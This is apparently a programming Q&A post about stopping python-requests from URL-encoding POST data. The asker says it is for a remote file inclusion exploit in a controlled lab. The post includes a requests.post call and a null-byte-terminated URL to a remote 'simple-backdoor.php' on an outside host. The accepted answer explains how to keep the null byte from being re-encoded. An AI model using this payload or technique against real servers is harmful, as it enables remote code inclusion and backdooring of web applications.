# Requests is encoding POST parameters when this is not desired

Tags: python, python-requests

Note that the following pieces of code are used for a remote file inclusion exploit in a controlled environment (not doing anything malicious here).

I'm trying to perform a post request to a URL:

```
resp = requests.post("http://example.com/test/index.php",data=post_data,cookies=cookie,proxies=proxies,config={'encode_uri': False})
```

One of the data parameters is a url which is used for file inclusion, at the end it has a nullbyte:

```
http://mysite.org/simple-backdoor.php%00
```

But what requests is doing is re-encoding the nullbyte at the end, making it useless

```
http%3A%2F%2Fmysite.org%2Fsimple-backdoor.php%2500
```

I tried appending `config={'encode_uri': False})` but this results in the same behavior. Does anyone have a clue how to disable this encoding or how to introduce a nullbyte character which gets encoded to %00?

Answer (score 2, accepted):

Requests v2.0.0 onwards doesn't have (thus respect) `encode_uri`. [It tries to encode data if data isn't a string](https://github.com/kennethreitz/requests/blob/master/requests/models.py#L71).

Use a unicode null-byte instead of %00, OR manually encode every component of `data` and form `data` as a string.